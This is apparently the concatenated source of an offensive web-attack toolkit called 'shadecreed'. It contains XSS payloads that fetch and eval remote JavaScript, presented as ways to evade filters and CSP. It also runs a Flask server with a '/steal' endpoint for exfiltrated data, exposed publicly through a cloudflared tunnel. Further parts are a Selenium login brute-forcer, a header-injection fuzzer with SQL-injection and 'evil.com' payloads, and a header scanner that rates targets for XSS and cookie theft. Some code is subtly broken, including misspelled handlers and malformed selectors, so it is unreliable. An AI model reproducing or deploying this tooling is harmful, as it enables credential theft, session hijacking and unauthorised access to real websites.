import shutil,textwrap
width = shutil.get_terminal_size((80,20)).columns
red ='\033[1;31m'
blue = '\033[1;34m'
yellow='\033[1;33m'
plain='\033[1;0m'
green='\033[1;32m'
bg_blue='\033[1;44m'
kt = f"""
@@@@@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@  @@  @@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@ -@@@@: @@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@ :@@@@@@. @@@@@@@@@@@@@@@
@@@@@@@@@@@@@@. @@@@@@@@ :@@@@@@@@@@@@@@
@@@@@@@@@@@@@@ @@@@@@@@@@ @@@@@@@@@@@@@@
@@@@@@@@@@@@@ =@@@@@@@@@@- @@@@@@@@@@@@@
@@@@@@@@@@@@@ @@@@*  +@@@@ @@@@@@@@@@@@@
@@@@@@@@@@@@#*@@@  @@  @@@=%@@@@@@@@@@@@
@@@@@@@@@@@@ @@@ %@@@@% @@@ @@@@@@@@@@@@
@@@@@@@@@@@@ @% @@@@@@@@ %@ @@@@@@@@@@@@
@@@@@@@@@@@@@@ @@@@@@@@@@ @#@@@@@@@@@@@@
@@@@@@@@@@@#@ @@@@@@@@@@@@ @%@@@@@@@@@@@
@@@@@@@@@@@  @@  @@@@@@  @@  @@@@@@@@@@@
@@@@@@@@@@@ +@@%  @@@%  @@@- @@@@@@@@@@@
@@@@@@@@@@@ @@@@@@ @@.@@@@@@ @@@@@@@@@@@
@@@@@@@@@@@.@@*@@@@@@@@@@*@@.@@@@@@@@@@@
@@@@@@@@@@ @@@@ @@@@@@@@ @@@@ @@@@@@@@@@
@@@@@@@@@@ @@@@  @@@@@@  @@@@ @@@@@@@@@@
@@@@@@@@@@ @@@@ @@@@@@@@ @@@@ @@@@@@@@@@
@@@@@@@@@@ @@@@@.-@@@@-:@@@@@ @@@@@@@@@@
@@@@@@@@@@@ @@@@@ @@@@ @@@@@ @@@@@@@@@@@
@@@@@@@@@.@@ @@@@@+@@=%@@@@ @@ @@@@@@@@@
@@@@@@@: : @@ @@@@%==%@@@@ @@ : :@@@@@@@
@@@@@*@@@@@ @@ @@@@@@@@@@ @@ @@@@@*@@@@@
@@@@@@@@@@@@%@@*@@@@@@@@#@@%@@@@@@@@@@@@
@@@@@@@@@@@@@@+@@@@@@@@@@+@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@{blue}𝙶𝚒𝚝𝚑𝚞𝚋 - 𝚑𝚊𝚛𝚔𝚎𝚛𝚋𝚢𝚝𝚎{plain}
"""

payload =f"""
\033[1;44mCUSTOM HEADER INJECTION (HTTPs/HTTPsV2)\033[1;0m

[+] Switch to landscape mode if necessary.

[+] Type `headers` to display pre-configured custom \npayloads.
[+] Type `cheaders` to display already active configured \npayloads.

[+] To modify headers:
    - key=value               → Modify a single header
    - key1=value1,key2=value2 → Modify multiple headers

[+] To delete headers:
    - del=key               → Delete a specific header
    - del=all               → Clear all custom headers

[+] Type `{red}q{plain}` to exit.
──────────────────────────────────────────────────
"""
payloadQuit = f"""
CLOSED CUSTOM HEADER INJECTION - RECENT HEADERS SAVED
"""
def banner():
  return kt

def menu(target):
  op = textwrap.dedent(f"""
  [H] Header editor
  [B] Custom brute force - beta 
  [X] Cross site scripting
  [J] Join community
  [Q] Quit
  ──────────────────────────────────────────────
  """)
  return op

brute = f"""
\033[1;44mSTAGE BRUTE ATTACK\033[1;0m

[!] Fill the necessary fields as needed.
[!] Type `{yellow}brute{plain}` on the fields we will be making multiple attempt.
[!] Multiple attempts would be made on the fields, in which you have entered `{yellow}brute{plain}`

GOODLUCK
──────────────────────────────────────────────────
"""

password = f"""
{bg_blue}PASSWORD FILE - '/path_to_dir/file_name.txt'{plain}
[+] Make sure it available in the provide directory path
e.g '{yellow}/storage/emulated/0/downloads/passwords.txt{plain}
\n
"""
xss = f"""
{bg_blue}CROSS SITE SCRIPTING{plain}

[+] Type `{red}q{plain}` to quit.
[!] Read : {yellow}https://github.com/harkerbyte/shadecreed{plain}
"""

def bruteAssist():
  return brute
def passwordAssist():
  return password
def payloadInject():
  return payload
def payloadInjectQuit():
  return payloadQuit

def xssStart():
  return xss
def xssAssist(url):
  cross_site_script = textwrap.dedent(f"""
  🟢 Dispatch Host is LIVE!

  🔥 Injectable Payloads:
  ─────────────────────────────
  🦎 Endpoint: 
  {url}
  
  📎 Inline:
  {green}<script src="{url}"></script>{plain}

  ⚠️ Moderate (stealthier):
  {yellow}<img src=f onerror="fetch('{url}').then(r => r.text()).then(code => eval(code))">{plain}
  
  🗿 Sigma (more-stealthier):
  {red}<img src=f oneerror="fetch('{url}').then(r => r.text()).then(code => {{
    let s = document.createElement('script')
    s.textContent = code;
    document.body.appendChild(s);
    }})">{plain}
  ─────────────────────────────
  💡 Choose your level:
  - Enpoint serves generated payload cdn-like, inject - escape - execute.
  - Inline is direct and simple (less obfuscated).
  - Moderate uses `onerror` call execution — stealthier, bypasses some filters.
  - Sigma bypasses CSP/`eval` injects via DOM then execute.
  
  🔒 Server is actively serving payloads from:
  → `payload.js` 

  """)
  return cross_site_script


import sys,time,httpx
hello = 'hello'
hi = 'hello fry woman'

json={
  "name" : "shade",
  "age" : 62,
  "github" : "harkerbyte"
}

def send_json():
  response = httpx.request('POST',sys.argv[1],headers = {"content-type":"application/json"} ,json=json)
  print(response.status_code)
  print(response.json)
  
if __name__=='__main__':
  pass


import os,re,sys,json,subprocess,time,signal
from shadecreed.ux.ascii import xssAssist
from shadecreed.ux.anime import wr,wrdel,wrtime,wrcold,wrloader
from shadecreed.core.utils.base import base_dir
class drive:
  def __init__(self,app_path=f'{base_dir}/app/app.py',flask_output=f'{base_dir}/core/middleware/flask.txt',tunnel_path=f'{base_dir}/core/middleware/tunnel.txt',silence_process = False,port=5000):
    self.silence_process = silence_process
    self.app_path = app_path
    self.flask_output = flask_output
    self.tunnel_path = tunnel_path
    self.app = None
    self.tunnel = None
    self.port = port
    self.server_url = None
      
  def start(self):
    try:
      with open(self.flask_output, 'w') as status:
        self.app = subprocess.Popen(['python', self.app_path, '%i'%int(self.port)], stdout=status, stderr=subprocess.STDOUT,text=True)
        wrcold('[+] Dispatch server setup in progress', timeout=5)
        if self.app_status():
          wrcold('[+] Started at PID : %s'% self.app.pid, timeout=2)
          if self.is_installed():
            with open(self.tunnel_path, 'w') as tunneled:
              self.tunnel = subprocess.Popen(['cloudflared','tunnel','--url', '127.0.0.1:%i'%int(self.port)], stdout=tunneled, stderr=subprocess.STDOUT,text=True)
              while True:
                wrcold('[!] Please wait...',co='\x1b[1;31m',timeout=5)
                try:
                  with open(self.tunnel_path, 'r') as pattern:
                    check = pattern.read()[0:]
                    match = re.search(r"https:\/\/[A-Za-z-]+\.trycloudflare\.[c-o]{2,3}", check)
                    self.server_url = match.group()
                    if self.server_url is not None:
                      if 'api.trycloudflare' not in self.server_url:
                        break               
                      else:
                        wr('Failed to request quick tunnel',co='\x1b[1;31m')
                        self.close()
                        break
                    time.sleep(3)
                except Exception:
                  pass
              wr(xssAssist(self.content_delivery()))
              self.process()
          else:
            wr('Missing cloudflared package, see documentation : https://pypi.org/project/shadecreed/',co='\x1b[1;33m')
            self.close()
        else:
          self.close()
    except Exception as error:
      print(error)
      self.close()
        
    
  def app_status(self):
    status = open(self.flask_output, 'r')
    stat = str(status.read())
    if 'Traceback' in stat:
      wrcold('An unexpected was encountered',co='\x1b[1;31m',reverse=True)
      self.close()
    elif not 'Running on all addresses' in stat:
      wrcold('\x1b[1;31m[!] Port %i is already in use\x1b[1;0m'%int(self.port))
      while True:
        try:
          self.port = input('\r[!] Enter a new listening port : ')
          if self.port.lower() == 'q':
            self.close()
          elif len(self.port) == 4 and int(self.port):
            break
        except Exception:
          pass
      self.start()
    else:
      self.process()
      return True
      
  def endpoint(self):
    return f'{self.server_url}/steal'
  
  def content_delivery(self):
    return f'{self.server_url}/payload.js'
    
  def my_imlinux(self):
    if os.name == 'nt':
      return False
    return [1]
  
  def is_installed(self):
    try:
      result = subprocess.run(['cloudflared','--version'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
      output = result.stdout.strip()
      if b'cloudflared' in output:
        return True
    except subprocess.CalledProcessError as e:
      wr(e.stderr)
    except FileNotFoundError:
      return []
 
  def listen(self):
    while True:
      try:
        pass
      except KeyboardInterrupt:
        self.close()
        break
  
  def process(self):
    with open(f'{base_dir}/core/middleware/process.json', 'w') as proc:
      store = {'keep-alive' : True if self.silence_process == True else False}
      json.dump(store, proc,indent=2)
    
  def close(self):
    if self.app:
      if not self.my_imlinux():
        self.app.send_signal(signal.CTRL_BREAK_EVENT)
        if self.tunnel:
          self.tunnel.send_signal(signal.CTRL_BREAK_EVENT)
      else:
        self.app.terminate()
        if self.tunnel:
          self.tunnel.terminate()
 
    
if __name__=='__main__':
  pass


import os,sys,json,argparse,httpx
from shadecreed.core.utils.parse import Parse
from shadecreed.core.utils.build import analyzeHeaders
from shadecreed.ux.anime import wr,wrdic
from shadecreed.ux.ascii import payloadInject,payloadInjectQuit
from shadecreed.ux.process import processResponse
from shadecreed.core.headers.network.proxy import proxyParse
from shadecreed.core.utils.base import base_dir,onload_file,cache_dir

# Optional fuzz payloads for testing header injection
fuzz_payloads = ["true", "admin", "' OR '1'='1", "1", "localhost", "evil.com"]

def mainTarget():
  with open(f'{cache_dir}/cache.json', 'r') as pin:
    target = json.load(pin)
  return target['target']
  
memory = {
  'target' : mainTarget(),
  'method' : 'GET',
  'header' : f'{base_dir}/core/headers/map.json',
  'proxy' : None,
  'redirects' : True,
}
def runHeaderEditor():
  try:
    parse = argparse.ArgumentParser(description="shadecreedcreed : toolkit; header editor (HTTPs/HTTPsV2)")
    parse.add_argument('-u','--url',help="<target_url> to open, inject payloads i.e WHERE * SELECT user='victim'",required=True)
    parse.add_argument('-m','--method',default="GET",help="<method:GET> | <method:POST> ",choices=["GET","POST","PUT","DELETE"])
    parse.add_argument('-s','--header',help="custom header directory path : <custom_header>.json")
    parse.add_argument('-p','--proxy',help="custom proxy; <format> address:port - No authentication support in version 0.0.2")
    parse.add_argument('-r','--redirect',help="Provide flag if you intend to allow redirects")
    args = parse.parse_args()
    if args.url:
      memory['target'] = args.url
      memory['method'] = args.method if args.method is not None else 'GET'
      memory['proxy'] = args.proxy if args.proxy is not None and ':' in args.proxy else None
      memory['redirects'] = True if args.redirect is not None else False
      
      if args.header:
        memory['header'] = args.header
        if os.path.exists(args.header):
          headerEditor(target=args.url,method=memory['method'],custom=onload_file(memory['header']),proxy=memory['proxy'],allow_redirects=memory['redirects'])
        else:
          wr(f'{args.header} was not found')
      else:
        headerEditor(target=args.url,method=memory['method'],custom=onload_file(memory['header']),proxy=memory['proxy'],allow_redirects=memory['redirects'])
  
  except KeyboardInterrupt:
    pass
 
def headerEditor(target=None,method=None,custom=None,proxy=None,allow_redirects=None):
  wr(payloadInject())
  while True:
    parsed_cmds = input('> ').strip()
    if parsed_cmds.lower() == 'q':
      wr(payloadInjectQuit())
      break
    elif parsed_cmds.lower() == 'headers':
      wrdic(onload_file(memory['header']),ti=0.005)
    elif parsed_cmds.lower() == 'cheaders':
      wrdic(onload_file(memory['header']))
    elif 'del' in parsed_cmds.lower():
      del_parsed = Parse(onload_file(memory['header']),parsed_cmds)
      finished_del = del_parsed.parse()
      with open(memory['header'], 'w') as deleted:
        json.dump(finished_del,deleted,indent=2)
      modRun(target=memory['target'],method=memory['method'],header=custom if custom is not None else finished_del,proxy=memory['proxy'])
    else:
      instance = Parse(onload_file(memory['header']),parsed_cmds)
      payload = instance.parse()
      save_to = memory['header']
      init_headers = onload_file(save_to)
      with open(save_to, 'w') as rewrite:
        init_headers.update(payload)
        json.dump(init_headers,rewrite,indent=2)
        
      modRun(target=memory['target'],method=memory['method'],header=custom if custom is not None else payload,proxy=memory['proxy'])
    
    
def modRun(target=None,method=None,header=None,proxy=None):
  
  response = httpx.request(method,target,headers=header,proxy=proxyParse(proxy),follow_redirects=memory['redirects'])
  analyzeHeaders(dict(response.headers))
  processResponse(response)
   
  
if __name__=='__main__':
  pass


class Parse:
  def __init__(self,init_cmds,cmds):
    self.init_cmds = init_cmds
    self.cmds = cmds
    self.fi = dict()
    self.use = self.reconstruct()
  
  def reconstruct(self):
    new_dict = dict()
    for key, value in self.init_cmds.items():
      new_dict[key.lower()] = value
    return new_dict
    
  def parse(self):
    if ',' in self.cmds:
      cmds = list(self.cmds.split(','))
      for co in cmds:
        if '=' in co:
          key, va = co.split('=')
          if key.lower() == 'del' and va != 'all' and va in self.use:
            del self.use[va]
          elif key.lower() == 'del' and va == 'all':
            self.use.clear()
          else:
            self.fi[key.lower()] = va
    else:
      if '=' in self.cmds:
        key, va = self.cmds.split('=')
        if key.lower() == 'del' and va != 'all' and va in self.use:
          del self.use[va]
        elif key.lower() == 'del' and va == 'all':
          self.use.clear()
        else:
          self.fi[key.lower()] = va
    return self.execute()
          
  def execute(self):
    if self.fi:
      for k, v in self.fi.items():
        self.use[k.lower()] = v
      self.use.pop('del', None)
    return self.use

if __name__=='__main__':
  pass


import os,sys,json
from shadecreed.ux.anime import wr,wrdel,wrcold
from shadecreed.ux.process import processContent
from shadecreed.core.utils.base import base_dir,cache_dir

class cache:
  def __init__(self,session_target,data,response):
    self.session_target = session_target
    self.data = dict(data)
    self.response = response
    self.store()
   
  def write(self):
    if not os.path.exists(f'{cache_dir}/cache.json'):
      with open(f'{cache_dir}/cache.json','w') as in_:
        in_.write('{}')
        in_.close()
      return True
    return ['q']
    
  def store(self):
    init = {'target': self.session_target,'content-size':len(self.response.content),'elapsed-time':f'{self.response.elapsed}'}
    for k, v in self.data.items():
      init.update({k : v})
    if self.write():
      with open(f'{cache_dir}/cache.json', 'w') as st:
        json.dump(init, st, indent=2)
      
      wrdel('[+] Server headers received', '[+] Data stored as cache 📜')
      processContent(self.response,f'{cache_dir}/page.html')
        
  def active(self):
    with open(f'{cache_dir}/cache.json', 'r') as re:
      res = json.load(re)
      try:
        if res['target'] == self.session_target:
          return True
      except KeyError:
        return None
  
  def read(self):
    if self.rmdr():
      with open(f'{cache_dir}/cache.json', 'r') as re:
        res = json.load(re)
        return res
      
      
  def clear(self):
    del_each = [f'{cache_dir}/cache.json',f'{cache_dir}/page.html',f'{base_dir}/core/utils/*.json']
    for each in del_each:
      try:
        os.path.remove(each)
        del_each.remove(each)
      except Exception:
        continue
    if not del_each:
      wrcold('Cache cleared',co='\x1b[1;31m',timeout=2)
    sys.exit()
 
      
if __name__ == '__main__':
  cache()


import os,sys,json,time,httpx,argparse,signal
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from shadecreed.ux.anime import wr,wrdic,wrdel,wrtime,wrcold,wrloader
from shadecreed.ux.ascii import red,blue,yellow,green,plain,bruteAssist,xssStart
from shadecreed.ux.process import skim
from shadecreed.core.headers.network.proxy import readCache, proxyTest
from bs4 import BeautifulSoup as bs
from jinja2 import Template
from shadecreed.core.middleware.drive import drive
from shadecreed.core.utils.base import base_dir,password_dir

def buildConfig(placeholder,submit,sub_tag):
  target= readCache()['target']
  if target:
    built = dict()
    built['targetweb'] = target
    with open(f'{base_dir}/core/utils/build.json', 'w') as builtconfig:
      for count in range(len(placeholder)):
        built[f'{placeholder[count]}'] = str(placeholder[count])
      built['sub_tag'] = sub_tag
      built['click'] = str(submit[0].strip())
      
      failed = input('Enter the page\'s failed response : ')
      built['failed'] = failed
      json.dump(built,builtconfig,indent=2)
    wr(f'[+] Automation config has been setup ✅\n')
    runBrute()
  else:
    wr('[+] Failed to retrieve session target')
    
def runBrute():
  use = dict()
  if os.path.exists(f'{base_dir}/core/utils/build.json'):
    with open(f'{base_dir}/core/utils/build.json') as configo:
      config = json.load(configo)
      target = readCache()['target']
      if target == config['targetweb']:
        while True:
          wr(bruteAssist())
          for key, value in config.items():
            if key not in ("targetweb","sub_tag","click","failed"):
              input_ = input(f'[{key}] : ')
              if input_:
                use[key] = input_.strip()
          not_brute = {k:v for k,v in use.items() if v != 'brute'}
          is_brute = {k:v for k,v in use.items() if v == 'brute'}
          use={**not_brute,**is_brute}
          if use:
            break
        option = webdriver.ChromeOptions()
        option.add_argument('--headless=new')
        option.add_argument('--disable-gpu')
        option.add_argument('--no-sandbox')
        option.add_argument('--incognito')
        option.add_argument("user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
        option.add_argument('--disable-blink-features=AutomationControlled')
        option.add_argument('--ignore-certificate-errors')
      
        driver = webdriver.Chrome(options = option)
        if os.path.exists(f'{password_dir}/passwords.txt'):
          with open(f'{password_dir}/passwords.txt') as passlist:
            pass_ = [each.strip() for each in passlist.readlines() if each.strip()]
            for i in range(len(pass_[:10])):
              try:
                driver.get(target)
                wrloader(15)
                wait = WebDriverWait(driver,60)
                for key,value in use.items():
                  if value.strip().lower() != 'brute':
                    wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, f'input[placeholder="{key}"]')))
                    enter = driver.find_element(By.CSS_SELECTOR, f'input[placeholder="{key}"]')
                    enter.clear()
                    enter.send_keys(value)
                  else:
                    wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, f'input [placeholder ="{key}"]')))
                    enter = driver.find_element(By.CSS_SELECTOR, f'input [placeholder="{key}"]')
                    enter.clear()
                    enter.send_keys(pass_[i])
                wait.until(EC.element_to_be_clickable((By.XPATH, f'//{config['sub_tag']}[contains(text(),"{config['click']}")]')))
                submit = driver.find_element(By.XPATH,f'//{config['sub_tag']} contains[text(), "{config['click']}"]')
                submit.click()
                wrcold(f'Trying - {pass_[i]}')
                page_text = bs(driver.page_source, 'html-parser').text
                if f'{config['failed']}' in page_text:
                  wrcold(f'Incorrect - {pass_[i]}',co=red,timeout=3)
                else:
                  wrcold(page_text)
              except KeyboardInterrupt:
                break
              except Exception as error:
                print(f'{red}{error}{plain}')
                driver.quit()
        else:
          wr('%s not found'%passwords, co=red)

def analyzeHeaders(url):
  report = {}
  if isinstance(url, dict):
    headers = url
  else:
    response = httpx.request('GET',url,follow_redirects=True)
    headers = dict(response.headers)
  # Normalize header keys (case-insensitive)
  headers = {k.lower(): v for k, v in headers.items()}
  
    # 1. Content-Security-Policy (CSP)
  csp = headers.get("content-security-policy", "")
  if not csp:
    report["CSP"] = "Not set - XSS friendly"
  elif "'unsafe-inline'" in csp or "'unsafe-eval'" in csp:
    report["CSP"] = f"Weak CSP -> contains {', '.join(d for d in ['unsafe-inline', 'unsafe-eval'] if d in csp)}"
  else:
    report["CSP"] = "Strong CSP -> payloads may be blocked"

    # 2. X-Content-Type-Options
  xcto = headers.get("x-content-type-options", "")
  if xcto.lower() == "nosniff":
      report["X-Content-Type-Options"] = "nosniff enabled -> MIME spoofing blocked"
  else:
      report["X-Content-Type-Options"] = "nosniff not set -> possible MIME tricks"

    # 3. X-Frame-Options
  xfo = headers.get("x-frame-options", "")
  if xfo:
    report["X-Frame-Options"] = f"Framing blocked: {xfo}"
  else:
      report["X-Frame-Options"] = "Framing allowed -> clickjacking possible"

    # 4. Access-Control-Allow-Origin
  acao = headers.get("access-control-allow-origin", "")
  if acao == "*":
    report["CORS"] = "Wide open CORS -> exfil via fetch possible"
  elif acao:
    report["CORS"] = f"CORS limited to: {acao}"
  else:
    report["CORS"] = "CORS not set -> restricts cross-origin JS fetch"

    # 5. Referrer-Policy
  refpol = headers.get("referrer-policy", "")
  if refpol in ["no-referrer", "strict-origin"]:
    report["Referrer-Policy"] = f"Limited referrer: {refpol}"
  elif not refpol:
    report["Referrer-Policy"] = "Not set -> referrer leaks possible"
  else:
    report["Referrer-Policy"] = f"Moderate: {refpol}"

    # 6. Set-Cookie
  cookies = headers.get("set-cookie", "")
  if cookies:
    if "httponly" in cookies.lower():
      report["Cookies"] = "HttpOnly -> JS can't access cookies"
    else:
      report["Cookies"] = "HttpOnly not set -> document.cookie exploitable"
  else:
    report["Cookies"] = "No Set-Cookie header"

    # 7. Content-Type
  ctype = headers.get("content-type", "")
  if "text/html" in ctype:
    report["Content-Type"] = "text/html -> XSS possible"
  else:
    report["Content-Type"] = f"Non-HTML: {ctype}"

    # 8. Server Banner (optional)
  server = headers.get("server", "")
  if server:
    report["Server"] = f"{server} -> check for known CVEs"
  else:
    report["Server"] = "Server banner not exposed"

  wrdic(report,co='\x1b[1;32m')

def runAnalyzeHeaders():
  parse = argparse.ArgumentParser(description="shadecreed : toolkit; xss vulnerebility scan ")
  parse.add_argument('--url',help="<target_url>",required=True)
  args = parse.parse_args()
  if args.url:
    if args.url.startswith('http'):
      analyzeHeaders(args.url)
    else:
      wr(f'{args.url} is not a valid http address')
    
redefine = lambda text : ''.join(' ' if c == '_' else c for c in text)

def runBuildXss():
  parser = argparse.ArgumentParser(description="shadecreed : toolkit; customize, forge and deploy payload to custom dynamic endpoints")
  parser.add_argument('--url', help="<target_url>", required=True)
  parser.add_argument('--script', help="script path")
  parser.add_argument('--endpoint',help="custom endpoint")
  args = parser.parse_args()
  
  if args.url:
    if args.url.startswith('http'):
      buildXss(url=args.url, template=args.script if args.script else None,endpoint=args.endpoint if args.endpoint else None)
    else:
      wr(f'{args.url} is not a valid http address')
    
def buildXss(url=None,template=None,endpoint=None):
  if url:
    analyzeHeaders(dict(httpx.request('GET',url,follow_redirects=True).headers))
  else:
    analyzeHeaders(readCache())
  try:
    wr(xssStart())
    if endpoint == None:
      silent = input('Live stream received datas [ Y/N ] : ').strip()
      if isinstance(silent, str) and silent.lower() != 'q':
        xss = drive(silence_process=True if silent.lower() in ('yes','y') else False)
        xss.start()
      elif silent.lower() in ('q','quit'):
        os.kill(os.getpid(), signal.SIGINT)
    context = {'endpoint' : endpoint if endpoint != None else xss.endpoint()}
        
    if template:
      if os.path.exists(template):
        with open(template, 'r') as temp:
          templated = Template(temp.read())
      else:
        wr(f'{template} was not found')
        sys.exit()
    else:
      with open(f'{base_dir}/core/library/template.js') as temp:
        templated = Template(temp.read())
        
    script_to_render = templated.render(context)
    with open(f'{base_dir}/app/static/payload.js', 'w') as script:
      script.write(script_to_render)
      
    
    try:
      if silent or not silent:
        if silent.lower() in ('no','n',''):
          wrcold('Currently unable to log received datas',co='\x1b[1;33m',timeout=3)
        wr('Grab a coffee ☕, this might take a while')
        wr('`ctrl+c` to close session',co='\x1b[1;31m')
        xss.listen()
    except UnboundLocalError:
      if template != None or endpoint != None:
        wr(script_to_render)
      
  except KeyboardInterrupt:
    print('\n')
  
    
  
if __name__ == '__main__':
  pass
    


import time,threading
from shadecreed.ux.anime import wrcold
class taskSchedule:
  def __init__(self):
    self.copied = []
    self.func_queue = []
    self.running = True
    self.queue_lock = threading.Lock()
    self.event_stop = threading.Event()
    self.worker = threading.Thread(target=self.run, daemon=True)
    self.worker.start()
    
  def add_task(self,func,*args,**kwargs):
    with self.queue_lock:
      if callable(func):
        self.func_queue.append((func,args,kwargs))
        
  def stop(self):
    self.running = False
    self.event_stop.set()
    self.worker.join()
    
  def run(self):
    while self.running:
      if self.event_stop.is_set():
        break
      task = None
      with self.queue_lock:
        if self.func_queue:
            task = self.func_queue.pop(0)
      if task:
        func, args, kwargs = task
        try:
          func(*args,**kwargs)
        except Exception as error:
          print(f'\x1b[1;33mError\x1b[1;0m Running {func.__name__} : {error}')
      else:
        time.sleep(0.5)
          
            
        
if __name__ == '__main__':
  pass


from flask import Flask,request,jsonify,send_file
import os,sys,traceback

module_path = os.path.abspath(os.path.dirname(os.path.join(__file__,'..','..')))
if not module_path in sys.path:
  sys.path.insert(0, module_path)
  
from shadecreed.core.middleware.schedule import taskSchedule
from shadecreed.ux.anime import wr
from shadecreed.ux.process import streamData
app = Flask(__name__)

schedule = taskSchedule()
@app.route('/steal', methods=['POST'])
def steal():
  try:
    data = request.get_json()
    if data:
        streamer = streamData(data)
        schedule.add_task(streamer.streaming)
        return jsonify({'status': 'success'}), 201
    else:
      return jsonify({'status': 'no data provided'}), 400
  except Exception as e:
    traceback.print_exc()
    return jsonify({'status':'error','message':str(e)}),500

@app.route('/payload.js')
def payload():
  send_file('static/payload.js',mimetype='application/javascript')
if __name__==('__main__'):
  try:
    if sys.argv[1]:
      use = int(sys.argv[1])
  except IndexError:
    use = 5000
  app.run('0.0.0.0',port=use, debug = False)
  


import sys,httpx,argparse
from bs4 import BeautifulSoup as bs
from shadecreed.ux.anime import wr,wrdic,wrdel
from shadecreed.ux.ascii import red,blue,yellow,green,plain
from shadecreed.ux.process import processResponse
from shadecreed.core.utils.build import buildConfig

assist = f"""

\033[1;44mAUTOMATE INPUT FIELDS INTERACTIONS\033[1;0m

[+] Add input fields by their placeholder text

    • Single Placeholder:
        → Type: placeholder

    • Multiple Placeholders (comma-separated):
        → Type: placeholder1, placeholder2, placeholder3

[!] Use exact placeholder text as it appears in the input \nfield
[!] Type `all` to retrieve all inputs with placeholder
[!] Type `done` to proceed further
[!] Type `{red}q{plain}` to exit.
──────────────────────────────────────────────────
"""
closed = f"""
CLOSED INPUT FIELDS AUTOMATION
"""
findsubmit=f"""
Now...Let\'s Proceed To Find The Submit Button
"""
def findInputs(document):
  retrieved = list()
  if document.find_all('input'):
    for found in document.find_all('input', attrs ={'placeholder' : True}):
      retrieved.append(found)
    
    return retrieved
  else:
    wr('There are no input field with placeholder')
  
def retrieveForm(form,target):
  elements = ['div','p','a','b','button']
  drop = list()
  for each in elements:
    drop.extend(form.find_all(each, string=target))
  wr(drop,ti=0.001)
    
    
def findSubmit(document,placeholders):
  wr(f'Retrieved inputs by placeholder : {yellow}{[item.get('placeholder') for item in placeholders]}{plain}', ti=0.0002)
  findbutton = True
  while findbutton:
    button,extracted = list(), []
    placeholders = list(placeholders)
    wr(findsubmit)
    target_form = placeholders[0].find_parent('form')
    sub_button = target_form.find('button', attrs={'type':'submit'}) or target_form.find('input', attrs={'type':'submit'})
    if sub_button:
      button.append(sub_button)
    else:
      while True:
        in_text = input('Type the submission `button` displayed text : ').strip()
        if in_text.lower() == 'q':
          button.clear()
          break
        elif in_text.lower().startswith('assist-'):
          if '-' in in_text:
            com, target = in_text.split('-')
            retrieveForm(target_form,target)
        else:
          sub_input = target_form.find('input', attrs={'value': in_text}) or target_form.find('input',attrs={'type':'submit'}) 
          if sub_input:
            button.append(sub_input)
            break
          else:
            sub_link = target_form.find('a', string=in_text)
            button.append(sub_link)
            break
    try:
      if button:
        wr(f'Type `{yellow}select{plain}` on which button submits the form \nType `{red}q{plain}` for previous')
        for extra in button:
          it_is = input(f'{str(extra.text if str(extra.text).strip() != "" else "🔍").strip()} : ').strip()
          if it_is.lower() == 'select':
            extracted.append(extra)
            buildConfig([text.get('placeholder') for text in placeholders],[str(extracted[0].text) if str(extracted[0].text).strip() != "" else "TgEnter"],str(extracted[0].parent.name))
          elif it_is.lower() == 'q':
            extracted.clear()
            findbutton = False
      else:
        wr('Submit button/link extraction... Failed')
    except Exception as error:
      print(error)
        

def runStartAssembling():
  parse = argparse.ArgumentParser(description="shadecreed toolkit : admin page custom brute force; this tool is in beta version and as of version 0.0.4 : it can only make 10 password attempts")
  parse.add_argument('-u','--url',help="<target_url> make sure that a form exists on the provided page url.")
  parse.add_argument('-r','--redirect', help="provide this flag if you intend to allow redirection.")
  args = parse.parse_args()
  
  if args.url:
    startAssembling(url=args.url,redirects=True if args.redirect is not None else False)
    
def startAssembling(document=None,parser='html.parser',url=None,redirects=None):
  if url != None:
    response = httpx.request('GET', url,follow_redirects=redirects if redirects is not None else False)
    if response.status_code != 200:
      processResponse(response)
      
      wr("provide '--redirect true' flag, if this issue persists",co='\x1b[1;31m')
      sys.exit()
    
    fdocument = response.text
  text = bs(fdocument if url is not None else document, parser)
  inputs = set()
  if text.find_all('form'):
    if text.find_all('input'):
      wr(assist)
      while True:
        placeholders = input('> ').strip()
        if placeholders.lower() == 'q':
          wr(closed)
          break
                
        elif placeholders.lower() == 'all':
          all_ = findInputs(text)
          if all_:
            for each in all_:
              wr(f'[+] Placeholder : {each.get('placeholder')}')
        elif placeholders.lower() == 'done':
          if inputs:
            findSubmit(text,inputs)
          else:
            wr('[+] You haven\'t added any inputs yet')
        else:
          if ',' in placeholders:
            for placeholder in placeholders.split(','):
              seen = text.find('input', attrs ={'placeholder' : placeholder.strip()})
              if seen:
                inputs.add(seen)
              else:
                wr(f'{placeholder.strip()} not found')
          else:
            seen = text.find('input', attrs ={'placeholder' : placeholders.strip()})
            if seen:
              inputs.add(seen)
              
            else:
              wr(f'[-] {placeholders}` not found')
  



import sys,time
from shadecreed.ux.ascii import width
green='\x1b[1;32m'
red='\x1b[1;31m'
yellow='\x1b[1;33m'
plain='\x1b[1;0m'

def wr(te,ti=0.0002,co=plain):
  sys.stdout.write(co)
  for ie in te:
    sys.stdout.write(ie)
    sys.stdout.flush()
    time.sleep(ti)
  sys.stdout.write(f'\n{plain}')
  
def wrdel(te,re,ti=0.005):
  for ie in te:
    sys.stdout.write(ie)
    sys.stdout.flush()
    time.sleep(ti)
  sys.stdout.write(f'\r')
  for e in range(len(re)):
    sys.stdout.write(f'\r{re[:e+1]}' + ' ' * (len(te)-e-1))
    sys.stdout.flush()
    time.sleep(ti)
  sys.stdout.write(f'\n')

def wrtime(te,ti=5,co=plain):
  sys.stdout.write(co)
  i=0
  while i <= ti:
    sys.stdout.write(f'{te} : {i}/{ti}\r')
    sys.stdout.flush()
    time.sleep(1)
    i+=1
  sys.stdout.write(f'{plain}\n')
  
def wrcold(te,ti=0.01,co=plain,timeout=1,reverse=False):
  sys.stdout.write(co)
  for ie in te:
    sys.stdout.write(ie)
    sys.stdout.flush()
    time.sleep(ti)
